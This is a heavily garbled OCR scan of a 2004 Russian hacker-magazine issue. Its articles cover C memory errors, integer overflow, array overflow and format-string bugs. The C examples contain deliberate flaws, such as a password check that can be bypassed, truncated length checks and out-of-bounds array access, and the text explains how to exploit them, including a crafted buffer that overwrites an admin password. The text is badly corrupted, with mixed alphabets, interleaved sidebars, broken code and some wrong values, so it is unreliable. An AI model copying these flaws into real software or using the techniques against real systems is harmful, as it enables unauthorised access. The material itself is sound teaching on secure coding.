float *pi; 
pi 


printf("pi is % 


Догадываешься, что может тут случиться? 
В начале программы создастся указатель на 
вещественное число, но мы его нарочно не 
проинициализировали. Выполнение такого 
кода в большинстве случаев приведет к 
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Большинство проблем возникает 
из-за того, что программа пытается 
получить доступ к памяти, лежащей 

вне доступных ей адресов. 


"Segmentation fault" или появлению 
окошечка с ошибкой. 

Резюмируем все вышесказанное. 
Большинство проблем возникает из- 
за того, что программа пытается полу- 
чить доступ к памяти, лежащей вне 
доступных ей адресов. Такие попытки 
операционная система пресекает в 
корне, прибивая процесс. 

Также, если не контролировать дли- 
ны буферов, случается, что одни дан- 
ные программы затирают другие. Это 
приводит ко всяким противным после- 
дствиям. Во избежание их в случае со 
строками были введены функции 
strn*, имеющие дополнительный па- 
раметр - максимальное число симво- 
лов для обработки. Их использование 
значительно безопаснее. 

Еще одним багом в работе програм- 
мы является неинициализированная 
нулями память, что особенно заметно 
при работе со строками. Чтобы не 
наткнуться на этот баг, следует ис- 
пользовать вместо malloc функцию 
calloc, которая не только выделит па- 
мять, но и обнулит ее. 


ОСВОБОЖДЕНИЕ ПАМЯТИ 

п Вспомним объектно-ориентиро- 
ванные языки программирования, 
например Java с ее сборщиком мусо- 
ра. Мы знаем, что, когда объект нам 
становится не нужен, вызывается 
деструктор и вся занимаемая им 
(объектом) память освобождается. 
Однако если во время работы прог- 
раммы некоторый объект динамичес- 
ки выделяет необходимую ему па- 
мять (например, под буферы, масси- 


вы), то после вызова деструктора все 
указатели на выделенные блоки па- 
мяти исчезнут, но память так и оста- 
нется неосвобожденной. Таким обра- 
зом, программа будет хранить дан- 
ные, которые ей абсолютно не нужны 
и ккоторым даже нет доступа. В 
больших программах это может при- 
вести не только к замедлению их ра- 
боты, но и к зависанию или даже кра- 
ху системы. Именно поэтому мы и по- 
говорим сейчас на тему освобожде- 
ния памяти. 


Смотри: 


while (true) { 
malloc(1); 


Запусти и увидишь, во что может 
вылиться такое безобидное действие, 
как выделение одного байта. И, к тому 
же, я уверен, что с каждой итерацией 
цикла количество используемой прог- 
раммой памяти будет возрастать да- 
леко не на один байт. 

Кстати, о выделении памяти. Когда 
делаешь это с помощью функций ти- 
па malloc, обязательно проверяй ука- 
затель на равенство NULL. Ведь мо- 
жет так случиться, что по определен- 
ным причинам система сумела выде- 
лить память и вернула NULL. А если 
обратишься по нулевому указателю, то 
неминуемо получишь окошечко с со- 
общением о завершении программы. 

Также стоит аккуратно обращаться 
с указателями на массивы, передавае- 
мыми в функцию. Поясню: 


int some_func(int *m) { 
while (*m != 0) { 
printf("%d\n", *m); 


++; 


Эта функция принимает указатель 
на массив целых и выводит его (мас- 
сива) содержимое на экран. Так ge- 
лать нельзя. Кто знает, сколько в 
этом массиве чисел. Понятно, что эту 
программу пишешь ты, а уж ты заве- 
домо знаешь, что чисел будет 17486, 
причем последнее из них является 
нулем, и все будет хорошо. А вдруг ты 
захочешь что-нибудь изменить? 
Вдруг ты решишь сделать 17 чисел, и 
последнее будет единицей? А функ- 
цию исправить забудешь. Или через 
пару месяцев столкнешься с анало- 
гичной задачей и просто скопируешь 
часть кода в новую программу? Вся- 
кое бывает. Как говорил Петя Нортон, 
"backup often". В данном случае будь 
предусмотрительнее. 

Чтобы описанная выше функция 
стала безопасной, необходимо доба- 
вить в нее второй параметр - количе- 
ство элементов массива, а также сде- 
лать проверку указателя на NULL. 


НАПУТСТВИЕ 

и Если ты пишешь на Visual С++, то 
могу посоветовать тебе очень полез- 
ную программу NuMega Bounds 
Checker. Она встраивается в VC, отс- 
леживает все выделения ресурсов и 
памяти, их освобождение, а по завер- 
шении работы программы выдает от- 
чет о том, где и сколько было взято, а 
сколько положено обратно :-). В свое 
время она помогла мне вылечить 
программу, которая, являясь сетевым 
сервисом, при больших нагрузках на- 
чинала "поедать" оперативную па- 
мять со скоростью несколько мега- 
байт в секунду! С тех пор я осознал, 
что контроль за выделяемой памятью 
и ее освобождение - не только хоро- 
ший тон, но и необходимость. 

В случае если ты программируешь 
nog Linux, советую смотреть в сторону 
библиотек наподобие dmalloc, Electric 
Fense. Такие библиотеки заменяют 
системные функции работы с па- 
мятью своими аналогами и ведут учет 
наподобие Bounds Checker'a. = 


Выделил 
память - не 
забудь ос- 
вободить! 


Используй 
при работе 
со строками 
вместо 
функции 
таНос 
функцию 
саНос, кото- 
рая не 
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INTEGER OVERFLOW 


ЧИСЛА КАК ОДНА ИЗ ПЕРВОПРИЧИН ВОЗНИКНОВЕНИЯ ОШИБОК 


re) H мог с легкостью написать эксплоит к ОЧау-уязвимости, он быстро стал известным в узких кругах и одним из 
первых узнавал о новых изъянах... Однажды ему принесли исходник, украденный у крупной фирмы. Это была 
реализация клиентской части для банковского персонала. Работенка предстояла не из легких... 


течением времени 


взломщики научились 


находить лазейки в са- 


мых безобидных, на 
первый взгляд, местах 
программы. Атаки, цель которых - пов- 
лиять на память приложения, уже 
давно эволюционировали от класси- 
ческих переполнений стека go ис- 
пользования целых систем техноло- 
гий. Причина эволюции очень проста - 
с каждым днем программисты получа- 
ют все больше и больше информации 
о возможных причинах возникнове- 
ния ошибки и способах их устране- 
ния. А поскольку растет грамотность 
разработчиков, то и ошибок они дела- 


Арифмети- ют меньше. Но все же некоторые по- 
ческое це- тенциально опасные места остаются 
лочисленное 

переполне- незамеченными. Чаще всего это це- 
ние - это почка мелких ошибок, которые не не- 
непредус- - 7 
ИЕ сут явной опасности и поэтому игно 
переход рируются. А ведь очень часто именно 
ERO такие ошибки и дают взломщику воз- 
какого-либо 

целого чис- можность проникновения. 

ла через 

ноль или 

мена ето ПРИСТУПИМ... 

знака всле- = Давай для начала вспомним кое- 
дствие 

ЕЕ что из теории представления чисел в 
ческих опе- 1АЗ2. Для работы с числами на уровне 
PERTTI GE, машинных кодов используются 8-, 16- 
этим чис- 


ai битные и т.д. регистры. Количество ис- 
пользуемых бит зависит от того, с ка- 


ПРИМЕР 1 


bool Protocol::CheckPassword( int intUserID, 
char* szPassword, int intPasswordSize ) { 

char* szOriginalPassword = GetPassword( intUserID ); 
bool bCorrect = FALSE; 

if( intPasswordSize <1) { [1] 
WriteToLog( "Password is less as 1 char" ); } 

else { bCorrect = TRUE; [2] 
intPasswordSize++; [3] 
int intOffset = 0; 

while( intOffset < intPasswordSize ) { [4] 
if ( szPassword[intOffset] != 
szOriginalPassword[intOffset] ) { 

bCorrect = false; 

break; } intOffset++; } 

} return bCorrect; } 
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кими типами программа имеет дело. A 
поскольку аля хранения значений 
численных переменных отводится ог- 
раниченное количество разрядов (би- 
тов), то появляются такие понятия, 
как максимальное и минимальное 
значения для каждого из типов. 
Можно заметить, что максимальное 
значение типа определяется не только 
количеством его разрядов. Если идет 
речь о числах со знаком, то диапазон 
принимаемых значений уменьшается 
ровно в два раза. То есть, если для без- 
знакового типа byte диапазон значений 
ot О go 255, то для знакового варианта 
он будет от -127 до +127. На машинном 
уровне число считается положитель- 
ным, если его самый старший разряд ра- 
вен нулю, и отрицательным в противо- 
положном случае. Таким образом, стар- 
ший разряд используется для служеб- 
ных целей, а для представления числа 
остаются свободными 7 бит, которыми 
можно описать только ОхХ7Е значений. В 
тоже время для беззнаковых чисел та- 
кого ограничения нет, и поэтому они ис- 
пользуют все 8 разрядов. Это утверж- 
дение справедливо для всех остальных 
целочисленных типов, разница заклю- 
чается только в разрядности типа. 
Поехали дальше. Следующее, что 
нужно помнить, - числа носят цикли- 
ческий характер. Это значит, что если 
взять беззнаковую переменную типа 
long, которая равна единице, и увели- 
чивать ее до тех пор, пока переменная 
не достигнет максимального значения 
ОХЕЕЕЕЕЕЕЕ (4294967295), то после 
следующего инкремента ее значение 


будет равно нулю, потом единице ит.д. 


Если же мы используем знаковый тип, 
то при достижении максимального по- 
ложительного значения 

Ох7ЕЕЕЕЕЕЕЕ (2147483647) следующий 
шаг увеличит значение go 
0х80000000. А это уже отрицатель- 
ное число, потому как оно больше по- 
ловины из OXFFFFFFFF Ha 1, и новым 
значением переменной будет 
2147483648. При каждой итерации 
значение переменной будет расти. Но 
оно будет стремиться к нулю (ведь - 
2147483648 < 0), а когда значение ста- 
нет равным ОХЕЕЕЕЕЕЕЕ (-1), то следую- 


тит Ромео МК МНО 
byte | 8 bit OxFF Ox7F 
short | 16 bit | OxFFFF Ox7FFF 
long | 32bit | OxFFFFFFFF | Ox7FFFFFFF 


Таблица размеров для данных разных 
типов 


Сравнение поведения знаковых и 
беззнаковых чисел (на примере типа 
byte) 


щий шаг установит значение перемен- 
ной в нуль. После чего повторяется 
заново. Как ты мог убедиться, числам 
не стоит особо доверять. Они имеют 
способность радикально изменять 
свои значения в самых непредсказуе- 
мых блоках программы. Причем ре- 
зультаты могут быть фатальны для 
сохранения целостности реализован- 
ной системы безопасности, приводя к 
возникновению аругих более опасных 
уязвимостей. А причин может быть 
множество, каждая из которых - про- 
явление специфических особенностей 
представления целочисленных типов. 


ПЕРЕХОД ПОЛОЖИТЕЛЬНОГО 
ЧИСЛА В ОТРИЦАТЕЛЬНОЕ 

m Более глубокое понимание техно- 
логий, с помощью которых можно go- 
биться каких-либо результатов, мани- 
пулируя лишь одними числами, при- 
дет после анализа уязвимых блоков 
программы, а также попыток их ис- 
пользования. Начинать изучение я 
предлагаю с примера 1. 

Его идея проста: сфункции передает- 
ся идентификатор пользователя, вве- 
денный пароль и его длина. Задача же 
функции - определить, правильно ли 
введен пароль. В плане программы это 
решается очень примитивно: идет 
простое посимвольное сравнение вве- 
денного и настоящего паролей. Чтобы 


Шестнад- 
цатерич- Значение Значение 
ное зна- без знака со знаком 
чение 
long 28633153 | 286331153 
short 4369 4369 
byte 17 is 
1 
i 
0 
0 
0 
long Af 65536 65536 
8 
0 
short о 0 (0) 
0 
0 
0 
byte 0 0 
0 
0 
le 
F 
В 
long E | 4294967295 4 
в 
Е 
Е 
short Е 65535 4 
Е 
Е 
Е 
byte 255) <i 
Е 
Е 
0 
0 
0 
long 7 983041 983041 
0 
0 
1 
short о 1 1 
0 
0 
1 
byte 1 1 
0 
1 
Е 
0 
0 
long 2 [4026593520 | -268373776 
0 
0 
short Е 61680 -3856 
0 
Е 
0 
byte 240 16 
F 
0 


Сравнение поведения знаковых и без- 
знаковых чисел (на примере типа byte) 


найти целочисленное переполнение, 
можно проанализировать ход испол- 
нения программы, выделяя недостатки 
и положительные черты алгоритма: 

Ф. Проверка длины введенного па- 
роля (длина больше нуля): 

+ пароль не может быть пустым (см. [1]) 

+ длина не может быть отрицатель- 
ной (см. [1]) 

- нет ограничений на максимальный 
размер (см. [1]) 

@. Посимвольная проверка пароля: 

- если введенный пароль прошел про- 
верку #1, то он считается правильным, 
пока не найдено хотя бы одно отличие 
между ним и настоящим (см. [2]). 

Собственно говоря, этих недостат- 
ков хватит, чтобы войти в систему, не 
зная правильного пароля. Цикл пост- 
роен таким образом, что он проверяет 
пароль от начала и go конца (или пер- 
вой ошибки), но кроме текста пароля 
делается дополнительная проверка 
на завершающий ноль строки (это де- 
лается для остановки сравнения, если 
достигнут конец любой из сверяемых 
строк), и именно она поможет обойти 
проверку. Дело в том, что, если нужно 
проверить и завершающий ноль, то 
количество проверок должно быть 
равно intPasswordSize (длине пароля) 
+ (ноль) (см. [3]). Поэтому перед нача- 
лом проверки значение 
intPasswordSize увеличивается на 
единицу. Если вспомнить, что ограни- 
чения на длину вводимого пароля нет 
(кроме проверки на отрицательность 
и ноль), то максимальная длина, кото- 
рую можно указать, - это OX7FFFFFFF. 
А поскольку используемый тип для 
хранения длины (int) - целое 32-бит- 


ное знаковое число, увеличение его 
(2147483647) на единицу приведет к 
целочисленному переполнению и пе- 
ременная intPasswordSize будет равна 
отрицательному числу 0х80000000 
(-2147483648). Это произойдет после 
проверки длины и перед проверкой 
самого пароля, а ведь именно в этом 
месте переменная bCorrect (qonar пра- 
вильности пароля) устанавливается в 
истину (см. [2]), и, если пароли не сов- 
падают при последующей проверке, 
то он устанавливается в ложь (па- 
роль неверный). Но нам это неважно, 
поскольку длина - отрицательное чис- 
no, a intOffset (индекс символа в паро- 
ле) имеет начальное значение O и ус- 
ловие для входа в цикл не исполнит- 
ся (см. [4]). А если программа не захо- 
дит в блок проверки пароля, а флаг 
bCorrect говорит о том, что пароль 
правильный, то функция 
CheckPassword вернет истину, тем са- 
мым предоставив возможность авто- 
ризации без правильного пароля. 
Этот пример очень прост для пони- 
мания, но в реальной жизни все обс- 
тоит гораздо сложнее. Чаще всего 
уязвимости такого класса преследуют 
одну цель - нарушить работу прило- 
жения в местах записи или чтения из 
памяти. Это делается, чтобы получить 
возможность внедрения shell-Koga 
и/или перезаписи указателей на 
функции, данные и т.о. И, чтобы как- 
нибудь повлиять на процессы записи 
в память, иногда можно прибегнуть к 
целочисленным переполнениям. Ос- 
новная идея атаки остается прежней, 
просто делаются попытки повлиять 


на переменные, хранящие размер бу- » 


Помни: неправильно выбранные число- 
вые типы могут привести к непредсказуе- 
мым результатам! 


ПРИМЕР 2 


const int MAX_SIZE = OxFF; 
const int ZERO_AT_EOS = 0х01; 


+ Protocol::GetMaxStrSize( int intMaximalSize, 


int intReservedSize ) { 


return intMaximalSize - ( intReservedSize + ZERO_AT_EOS ); } 
char* Protocol::GenerateFullName( char* szUserName , 


int intUserNameSize ) { 


unsigned short shUserNameSize = intUserNameSize; 
char* szDomainName = GetDomainName(); 


if( shUserNameSize > 


[1] 


GetMaxStrSize( MAX_SIZE, strlen(szDomainName ) ) ) { 


WriteToLog( "UserName is too long" ); } 


else { char* szResult = new char[MAX_SIZE]; 
memcpy( szResult, szUserName, intUserNameSize ); [2] 


memcpy( szResult + intUserNameSize, 


szDomainName, strien( szDomainName ) ); 


szResult[ intUserNameSize + 


strien( szDomainName ) ] = '\xOO'; } } 


Потеря зна- 
чимых раз- 
рядов - это 
ситуация, 
которая мо- 
жет возник- 
нуть при 
копирова- 
нии чисел с 
большей 
разряд- 
ностью в 
числа с 
меньшей, 
при этом 
старшие 
разряды бу- 
дут потеря- 
ны для при- 
емника. 
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INTEGER OVERFLOW ) 


qpepa, его длину и все, что с этим свя- 
зано. Хотя арифметические перепол- 
нения и могут привести к переполне- 
ниям памяти, на практике чаще можно 
встретить уязвимости, несущие нес- 
колько другой характер. 


ПРОБЛЕМА ПОТЕРИ 
ЗНАЧИМЫХ РАЗРЯДОВ 

и Взгляни на пример 2 (в нем функ- 
ция получает имя пользователя и 
возвращает его полное имя, включа- 
ющее также название домена) и по- 
пытайся понять, что в нем не так. 

На первый взгляд, проблем в функ- 
ции нет, но это только кажется. Дело в 
том, что дункция СепегаеРи!Мате по- 
Лучает два параметра: имя пользовате- 
ля (указатель на строку) и длину этого 
же имени (32-битное число). При входе 
в функцию происходит проверка, по- 
местится ли полное имя пользователя 
в строку-результат (см. [1]). И если non- 


Все, что ты ное имя превосходит по размерам не- 


прочел в кий максимальный размер MAX_SIZE, 

этои статье = 

носит толь- = ТО Копирование He производится. Всег 

ко инфор- да ли это так? Сравнение длины произ- 

характер ы водится относительно переменной 

не должно shUserNameSize, a He intUserNameSize, 

О причем они должны быть равны друг 

законных другу. На самом gene, последнее утве- 

Paice рждение не всегда справедливо. И это 
татья рас- 

считана на связано с разрядностью разных типов 

программис- — данных, что приводит к обрезанию зна- 

р pein . чений переменных. 

повысить Таким образом, если аргумент ‹функ- 

yporens Oe: ции intUserNameSize будет больше, 

в своих при- eM OxFFFF, то в shUserNameSize за- 

ложениях. пишутся только последние 16 разря- 


дов. Например, если указать, что дли- 


ПРИМЕР 3 


char* Protocol::;GenerateFullName( char* szUserName , 
int intUserNameSize ) { 

char* szDomainName = GetDomainName(); 

if( intUserNameSize > [1] 
GetMaxStrSize( MAX_SIZE, strlen(szDomainName ) ) 
{ 

WriteToLog( "UserName is too long" ); } 

else { char* szResult = new char[MAX_SIZE]; 
memcpy( szResult, szUserName, intUserNameSize ); 
[2] 

memcpy( szResult + intUserNameSize, 
szDomainName, strlen( szDomainName ) ); 
szResult[ intUserNameSize + 

strlen( szDomainName ) ] = '\x0O'; } } 


ПРИМЕР 4 


If (( intUserNameSize + intDomainNameSize ) > 
GetMaxStrSize( MAX_SIZE, О) ) { 
WriteToLog( "UserName is too long" ); } 


ХАКЕРСПЕЦ | 08(45) | 2004 


Операция Знаковое Беззнаковое 
128 + 0 28 128 
127 + -128 м 255 
Ех = № 2 254 
129 + 1 -128 128 
28 - 08 0 0 
128 / 1 128 128 
НР) + 128 128 


Примеры обрезания значимой части чи- 
сел при их конвертировании 


на имени составляет 0х10001 (65537), 
в проверке произойдет сравнение 
требуемой длины строки с длиной 
имени Ox0001 (1). ОхООС1 - потому, что 
первая единичка отбрасывается, так 
как она не входит в младшие 16 раз- 
рядов. Естественно, что в таком слу- 
чае проверка на максимальную длину 
строки не сработает и выполнение 
функции будет продолжено. Но самое 
интересное! При записи используется 
переменная intUserNameSize (см. [2]), 
и поэтому вместо копирования одного 
байта происходит копирование 
Ox10001 байт. А это уже не что иное, 
как переполнение, которое может 
быть успешно эксплуатировано. 


ПРОБЛЕМА ПРИОБРЕТЕНИЯ 
СТАРШИХ РАЗРЯДОВ 

п Часто бывает так, что для того 
чтобы обезопасить функцию от по- 
лучения отрицательных значений, 
программисты ошибочно используют 
конвертирование знаковой перемен- 
ной в беззнаковую. Этот подход тре- 
бует дополнительной проверки пере- 
менной перед конвертированием, по- 
тому что эта операция может привес- 
ти к вращению вокруг нуля. Такие 
проверки делаются очень редко и 
поэтому могут стать причиной воз- 
никновения ошибок. Еще более ин- 
тересная особенность проявляется 
при преобразовании числа из типа с 
меньшим количеством разрядов в 
тип с большим (например, из char в 
short). Дело в том, что если источник 
был типа char, то при переводе его в 
short значение приобретет дополни- 
тельных 8 разрядов. И если значе- 
ние char было отрицательным 
(>Ох7Р), то эти разряды станут равны- 
ми единице (OXFF). (см. скрин). 

Давай рассмотрим проблему конверти- 
рования типов на следующем примере: 


char chValue = 0x80; // chValue = -128 

short shValue = chValue; // shValue = Oxff80 
( -128 ) 

unsigned short ushValue = shValue:// 
ushValue = Oxff80 ( 65408 ) [1] 


Таким образом, переменная shValue 
получит правильное значение (за 
счет заполнения верхних разрядов в 
OxFF), но проблема возникает при пе- 
реводе со знакового слова в беззна- 
ковое (см. [1]). Переменная ushValue 
приобретает значение 65408, а это 
уже далеко не -128. 


ПРОБЛЕМА 
ОПРЕДЕЛЕНИЯ ТИПА 

m= Если более детально изучить при- 
мер 2, то можно выделить еще одну 
проблему относительно параметра 
intUserNameSize (длины строки). Более 
того, в примере 4 она присутствует то- 
же, хотя в нем нет преобразований ти- 
пов, так же, как и нет математических 
операций, которые могли бы привести 
к переполнению intUserNameSize. Ус- 
ловие [1] создано, чтобы запретить за- 
пись в буфер строк, которые превосхо- 
дят его по длине. 

Принцип проверки прост - длина ис- 
точника меньше размера приемника. 
Если она превышает допустимый раз- 
мер, то функция прекращает свою pa- 
боту. Но проблема заключается в том, 
что при сравнении чисел учитывается 
их знак. А это значит, что если передать 
intUserNameSize с отрицательным зна- 
чением, то проверка будет проигнори- 
рована, так как отрицательное число 
будет всегда больше положительного 
результата, возвращаемого функцией 
GetMaxStrSize. Самое интересное, что 
по идее функция memcpy должна про- 
игнорировать отрицательный объем 
для копирования (см. [2]). А на самом 
деле все происходит иначе - она обра- 
батывает аргумент длины как беззнако- 
вую переменную. Таким образом, ей пе- 
редается очень большое число (боль- 
ше, чем OX7FFFFFFF), и она должна по- 
пытаться скопировать строку этой дли- 
ны в буфер результата. Но это приве- 
дет к тому, что приложение аварийно 
закончит свою работу. Эта техника хо- 
роша для обхода разного рода условий, 
но для эксплуатации в чистом виде она 
не может быть использована. Более ин- 
тересно, если memcpy передаются пе- 
ременные типа byte(char) или даже 
word(short), потому как их максималь- 
ное значение не столь велико, а это да- 
ет возможность эксплуатировать функ- 
ции, которые принимают строки, без яв- 
ного указания их длины в аргументах. 

Также не стоит забывать о том, что 
проверка, реализованная в примере 4, 
тоже является некорректной, посколь- 
ку при сложении двух положительных 
чисел результат может оказаться отри- 
цательным. Посмотри на таблицу, что- 
бы убедиться, что результат аридфмети- 
ческой операции не всегда такой, каким 
он должен получиться на самом gene. 

Числа - это загадка, тем более когда 
речь идет о компьютерных технологи- 
ях. Ты можешь написать грамотное 
приложение, но если неправильно 
выбраны числовые типы, то это может 
привести к непредсказуемым резуль- 
татам! Представь себе, условия не ра- 
ботают корректно, ограничения на 
размер буфера сняты! Это достаточ- 
ное условие для хакера, и, поверь, ес- 
ли он знает о числах столько же, 
сколько и ты сейчас, то он с лег- 
костью взломает твою программу! Не- 
обходимо запомнить эти тонкости, и 
тогда ты сможешь без особого труда 
находить ошибки такого класса. 
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МАССИВНОЕ ПЕРЕПОЛНЕНИЕ )) 


Мысла Владислав aka DigitalScream (digitalscream@real.xakep.ru) 


МАССИВНОЕ 
ПЕРЕПОЛНЕНИЕ 


А ТЫ ЗНАЕШЬ, ЧТО ТАКОЕ ARRAY OVERFLOW? 


о ставались считанные секунды... "Не может быть, что нельзя угадать 10-значный код для входа, если системой 
пользуется миллион клиентов", - думал он... Код за кодом - закрыто! Но вдруг блок ввода заморгал... 


же много лет хакеры 


пользуются перепол- 


нением буфера в борь- 


Массив - 
это после- 
дователь- 
ность эле- 
ментов оди- 
наковой 
структуры. 
Например, 
массив чи- 
сел - это 
последова- 
тельность 
чисел и ни- 
чего друго- 
го. 


По сути, пе- 
реполнение 
массивов - 
это обычное 


переполне- 
ние буфера, 
происходя- 
щее при об- 
работке 
массивов. 


бе за нужную инфор- 
мацию. Постоянно на- 
ходятся новые ошибки, их связывают 
одну с другой, классифицируют. В на- 
ше время найти ошибку переполне- 
ния в распространенном продукте go- 
вольно сложно. Порой кажется, что 
ошибки нет или ею нельзя восполь- 
зоваться. А чаще всего именно безо- 
бидные, на первый взгляд, ошибки 
приводят к возможности несанкцио- 
нированного управления работой 
приложения. Чтобы воспользоваться 
такими уязвимостями, надо прове- 
рить, при обработке каких данных 
происходит ошибка. В этой статье 
речь пойдет об ошибках работы с 
массивами. 

В примере 1 описан псевдокласс 
Door, который занимается управлени- 
ем входной дверью, причем, перед 
тем как закончить свою работу, он 
сохраняет все неправильно введен- 
ные пароли в виде логов. 

Какую ошибку хранит в себе этот код? 


ЧТЕНИЕ ДАННЫХ ИЗ ПАМЯТИ 
При работе с массивами данных 
программист использует массивы. Если 
необходимо хранить в массиве объекты 


ПРИМЕР 1. ПРОТОКОЛИРО- 


ВАНИЕ ОШИБОК 


LzeriD collection 


Pasaword 


или структуры, то он может с легкостью 
создавать массивы, в качестве эпемен- 
тов которых будут нужные ему данные. 
Но, если нужно создать массив строк, то 
в качестве элементов необходимо брать 
указатели на строки, а не их самих. Это 
определено тем, что элементом массива 
может быть любой тип данных, с пре 
допределенным объемом. А строка мо- 
жет состоять из1, 2, 6, 165 байтов, поэто- 
му в массив записывается именно ука- 
затель на строку (он занимает 4 байта), 
который никак не зависит от ее длины. 
Давай посмотрим на пример 2. Что 
здесь неверно? На первый взгляд, все в 
порядке: срункции GetUserIDBylndex ne- 
редают индекс пользователя, а она 
возвращает его идентификатор. Для 
хранения идентисикаторов использует- 
ся массив UserIDList из ОхО7 элементов 
(нумерация начинается с нуля). Но что 
будет, если мы передадим 
GetUserIDBylndex число, большее ОхО7, 
то есть что произойдет при попытке дос- 
тупа к элементу с индексом больше раз- 
мерности массива? 

Взгляни на рисунок. Это участок па- 
мяти, в которой хранится список иден- 
тификаторов пользователей, и объяв- 
ленная сразу же за ним переменная, 
в которой хранится пароль админа. 
Если ты попытаешься передать CpyHk- 
ции GetUserlDBylndex в качестве аргу- 


ПРИМЕР 2. ПЕРЕПОЛНЕНИЕ 


МАССИВОВ 
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ПРИМЕР 3. ИСПОЛЬЗОВА- 
НИЕ ПЕРЕПОЛНЕНИЯ 


МАССИВОВ #1 


ПИ 
мента единицу, то она вернет иденти- 


фикатор первого пользователя, двой- 
ку - второго и т.д. Но, если передать 
ей число 8, функция все равно вер- 
нет результат. Откуда взялся 8-й эле- 
мент, если размер списка - 7? Все 
очень просто: индекс элемента - это 
неявный указатель на местоположе- 
ние элемента в памяти. Неявный пото- 
му, что адрес вычисляется как ад- 
рес_массива+индекс_элемента*раз- 
мер_элемента. В нашем примере раз- 
мер элементов - 1 байт, значит индекс 
и будет смещением относительно на- 
чала массива. Но! В памяти сразу за 
массивом находится пароль админа, а 
так как идентификаторов всего 7, 
то 8-й индекс - это первый символ 
пароля. Таким образом, если суще- 
ствует функция, предназначенная 
для аутентификации пользователя, 
которой передают индекс пользова- 
теля и пароль, причем она имеет BUG, 
показанный в примере 3 (в случае 
неправильного пароля выводит сооб- 
щение об ошибке, содержащее иден- 
тификатор пользователя), то, передав 
ей индекс 8, ты получишь сообщение 
вида "Bad password for user 97". 

Если интерпретировать число 97 как 
код символа, то результатом будет "а" - 
первый символ пароля. И если теперь 


последовательно передавать функции 
LoginIDBylndex числа 9, 10 и T.g., ты 
сможешь узнать пароль админа. 


ПЕРЕЗАПИСЬ 
ДАННЫХ В ПАМЯТИ 

Массивы могут хранить в себе 
опасность более высокую, чем чтение 
памяти. Куда интереснее случаи, ког- 
да есть возможность записи в масси- 
вы (пример 4). 

Давай посмотрим, что происходит. 
SetData - это функция, которая копи- 
рует данные юзера в свою область 
памяти. Причем она не проверяет раз- 
мер копируемых данных, а приемник 
IpTable ограничен размером 
ОхЕЕ(255). И, как ты уже догадался, 
если передать функции данные, раз- 
мер которых больше 255, то элементы 
из IpData с индексом, большим 254 
(нумерация с нуля), будут скопирова- 
ны не в IpTable, а в szPassword, кото- 
рый находится в куче прямо после 
IpData. Поэтому все числа, что не по- 
местились в IpData, перезапишут па- 
роль. Осталось только передать свой 
пароль :-). Для этого можно передать 
функции буфер, состоящий из: 

- 255*4 байт данных (перезаписать 
IpTable), 

- числа Ox61616161 (перезаписать па- 
роль), 

- числа Ох0О0000000 (закончить 
строку пароля нулевым байтом). 


ПРИМЕР 4. ИСПОЛЬЗОВА- 
НИЕ ПЕРЕПОЛНЕНИЯ МАС- 


СИВОВ #2 


В результате пароль изменится на 
"аааа" и может быть использован для 
авторизации в системе. 


ПЕРЕЗАПИСЬ ДАННЫХ 
В СТЕКЕ ИЛИ КУЧЕ 
Как видишь, можно манипулиро- 

вать ходом исполнения программы, 
используя ошибки в работе с масси- 
вами. Взгляни на пример 5. У нас име- 
ется функция, которая создает мас- 
сив и записывает в указанный эле- 
мент какое-либо число, и функция, ко- 
торая показывает пароль админа. 

Массив рМемаа является времен- 
ным, и поэтому память аля него выде- 
ляется в стеке. Учитывая архитектуру 
стека и местоположение буфера, мож- 
но говорить о том, что, если в качестве 
индекса указать число, превосходя- 
щее размеры массива, оно перезапи- 
шет собой данные, находящиеся в 
верхних адресах. А среди них есть и ag- 
рес возврата для выхода из функции, 
поэтому если передать сфункции пара- 
метры Ox101 и любое другое число "А", 
то при выходе из функции управление 
передастся на адрес, указанный в пе- 
ременной "А". Так, например, если 
знать адрес сфункции ShowPassword и 
указать его в качестве второго пара- 
метра, то программа покажет пароль 


ПРИМЕР 5. ИСПОЛЬЗОВА- 
НИЕ ПЕРЕПОЛНЕНИЯ МАС- 


СИВОВ #3 


админа. Но это уже - переполнение сте- 
ка, рассмотрение которого в рамки дан- 
ной статьи не входит. Если память под 
массив выделяется в куче, то получить 
управление можно, перезаписав гло- 
бальную таблицу смещений функций. 
Способов много и все определяется 
архитектурой уязвимого приложения. 


ОБХОД ОГРАНИЧЕНИЙ НА 
РАЗМЕРНОСТЬ МАССИВА 
Однако не все так просто. Во избе- 
жание переполнений в обработке мас- 
сивов программеры используют про- 
верки на указанный индекс элемента. 
Если он больше размера массива, то 
операция отменяется (пример 6). 

Но и здесь есть выход! Переменная 
intDefaultIndex является числом, но 
числом со знаком. Поэтому, хотя про- 
верка на размер производится, значе- 
ние не проверяется на отрицатель- 
ность. Это значит, что, если в прош- 
лом примере ты указал номер элемен- 
та Ox101, то теперь необходимо просто 
вычислить его: индекс = старый_ин- 
декс + Ox80000000. Таким образом, 
появляется возможность обхода про- 
верки на указанный индекс элемента. 

Теперь ты знаком с уязвимостями 
класса Array Overflow. Нужно иметь в 
виду возможность такого взлома и 
думать о своей защите. 


Более де- 
тальную 
информа- 
цию о цело- 
численных 
переполне- 
ниях ты мо- 
жешь найти 
в статье 
"Integer 
Overflow". 


Атака Ha 
переполне- 
ние массива 
может быть 
использова- 
на как спо- 
соб получе- 
ния контро- 
ля над ис- 
полнением 
программы. 
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НЕ ВЕДИСЬ НА ВСЕ ПОДРЯД, ЧИТАЙ WWW.XAKEP.RU 


- НУИ ГДЕ МОЙ КРЯКЕР ИНТЕРНЕТА? 


- А ТЫ ЗАПУСТИ .ЕХЕ-ШНИК ИЗ АТТАЧА! 
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ДЕРНИ PRINTF ЗА ХВОСТ) 


Крис Касперски аКа мыщьх 


ДЕРНИ PRINTF 
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ФОРМАТИРОВАННЫЙ ВЫВОД ПОД ПРИЦЕЛОМ 


зык Си выгодно отличается от Паскаля поддержкой спецификаторов, представляющих собой мощный 
инструмент форматного ввода/вывода. Настолько мощный, что фактически образует язык внутри языка, 
полигон для взломщика. 


+. 
шибки cpopmatHoro вы-  МАВЯЗЫВАНИЕ СОБСТВЕННЫХ строку "%5". Программа выдаст сле- 
вода не многочислен- СПЕЦИФИКАТОРОВ дующее: 
ны и встречаются, и Если пользовательский ввод по- 
главным образом, в падет в строку дформатного вывода 
ИМХ-приложениях, где (что происходит довольно часто) и на- 
традиции терминального режима все ходящиеся в нем спецификаторы не 
еще сильны. По некоторым оценкам, в будут отфильтрованы, злоумышлен- Чтобы понять, что такое "hello, %s!" 
2002 году было обнаружено порядка ник сможет манипулировать интерп- и откуда оно здесь взялось, необходи- 
